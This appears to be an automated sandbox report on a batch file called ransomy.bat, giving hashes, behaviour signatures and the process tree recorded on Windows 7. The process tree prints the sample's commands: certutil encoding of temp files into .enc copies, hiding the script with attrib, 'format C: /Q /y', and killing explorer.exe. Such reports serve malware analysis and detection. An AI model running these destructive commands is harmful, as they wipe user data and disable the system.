Overview

overview

1

Static

static

1

ransomy.bat

windows7-x64

1

ransomy.bat

windows10-2004-x64

1

Analysis

  • max time kernel
    121s
  • max time network
    126s
  • platform
    windows7_x64
  • resource
    win7-20230831-en
  • resource tags

    arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
  • submitted
    12-10-2023 07:33

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ransomy.bat

  • Size

    76KB

  • MD5

    ac7bd476884ac22af065c826c9a2c58f

  • SHA1

    a02294112ff2e1fdfa74f9a756e60b6cfbabbb8c

  • SHA256

    89d2f519899c83c730725ff810a5e404346386f634d41ddffa366aded01d618e

  • SHA512

    230c25e85109aecc93768b98e65eccc9733a6179a891ff75bfcf4bcf588ae0287af8433037e87baf2b01169bfbbb82ea00eb9533e092a5bd9c0800d3c72f715d

  • SSDEEP

    384:zqmB+m9dm9hm9rm99m93ml5mlomlumlSmlcmlsmlkmllmlZmjDmlfmn7mlJmlTmI:TjcIm8KcBn7Vl9oemQes2kL

Score
1/10

Malware Config

Signatures

  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Kills process with taskkill 1 IoCs
    evasion
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 48 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs
    evasion

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\ransomy.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1916
    • C:\Windows\system32\certutil.exe
      certutil -encode "C:\Users\Admin\AppData\Local\Temp\dd_NDP472-KB4054530-x86-x64-AllOS-ENU_decompression_log.txt" "C:\Users\Admin\AppData\Local\Temp\dd_NDP472-KB4054530-x86-x64-AllOS-ENU_decompression_log.txt.enc"
      2⤵
        PID:1228
      • C:\Windows\system32\certutil.exe
        certutil -encode "C:\Users\Admin\AppData\Local\Temp\dd_SetupUtility.txt" "C:\Users\Admin\AppData\Local\Temp\dd_SetupUtility.txt.enc"
        2⤵
          PID:1532
        • C:\Windows\system32\certutil.exe
          certutil -encode "C:\Users\Admin\AppData\Local\Temp\dd_vcredistMSI1F75.txt" "C:\Users\Admin\AppData\Local\Temp\dd_vcredistMSI1F75.txt.enc"
          2⤵
            PID:1892
          • C:\Windows\system32\certutil.exe
            certutil -encode "C:\Users\Admin\AppData\Local\Temp\dd_vcredistMSI1FD7.txt" "C:\Users\Admin\AppData\Local\Temp\dd_vcredistMSI1FD7.txt.enc"
            2⤵
              PID:2424
            • C:\Windows\system32\certutil.exe
              certutil -encode "C:\Users\Admin\AppData\Local\Temp\dd_vcredistUI1F75.txt" "C:\Users\Admin\AppData\Local\Temp\dd_vcredistUI1F75.txt.enc"
              2⤵
                PID:2992
              • C:\Windows\system32\certutil.exe
                certutil -encode "C:\Users\Admin\AppData\Local\Temp\dd_vcredistUI1FD7.txt" "C:\Users\Admin\AppData\Local\Temp\dd_vcredistUI1FD7.txt.enc"
                2⤵
                  PID:2560
                • C:\Windows\system32\certutil.exe
                  certutil -encode "C:\Users\Admin\AppData\Local\Temp\dd_wcf_CA_smci_20230901_013010_697.txt" "C:\Users\Admin\AppData\Local\Temp\dd_wcf_CA_smci_20230901_013010_697.txt.enc"
                  2⤵
                    PID:3036
                  • C:\Windows\system32\certutil.exe
                    certutil -encode "C:\Users\Admin\AppData\Local\Temp\dd_wcf_CA_smci_20230901_013011_945.txt" "C:\Users\Admin\AppData\Local\Temp\dd_wcf_CA_smci_20230901_013011_945.txt.enc"
                    2⤵
                      PID:2260
                    • C:\Windows\system32\certutil.exe
                      certutil -encode "C:\Users\Admin\AppData\Local\Temp\FXSAPIDebugLogFile.txt" "C:\Users\Admin\AppData\Local\Temp\FXSAPIDebugLogFile.txt.enc"
                      2⤵
                        PID:2596
                      • C:\Windows\system32\certutil.exe
                        certutil -encode "C:\Users\Admin\AppData\Local\Temp\Microsoft .NET Framework 4.7.2 Setup_20230901_012943179-MSI_netfx_Full_x64.msi.txt" "C:\Users\Admin\AppData\Local\Temp\Microsoft .NET Framework 4.7.2 Setup_20230901_012943179-MSI_netfx_Full_x64.msi.txt.enc"
                        2⤵
                          PID:2668
                        • C:\Windows\system32\attrib.exe
                          attrib +h C:\Users\Admin\AppData\Local\Temp\ransomy.bat
                          2⤵
                          • Views/modifies file attributes
                          PID:2680
                        • C:\Windows\system32\format.com
                          format C: /Q /y
                          2⤵
                            PID:2696
                          • C:\Windows\system32\mode.com
                            mode con cols=107 lines=41
                            2⤵
                              PID:2720
                            • C:\Windows\system32\taskkill.exe
                              taskkill /f /im explorer.exe
                              2⤵
                              • Kills process with taskkill
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2708
                            • C:\Windows\system32\ipconfig.exe
                              ipconfig
                              2⤵
                              • Gathers network information
                              PID:2780
                            • C:\Windows\system32\findstr.exe
                              findstr IPv4
                              2⤵
                                PID:2488

                            Network

                            MITRE ATT&CK Enterprise v15

                            Replay Monitor

                            Loading Replay Monitor...

                            Downloads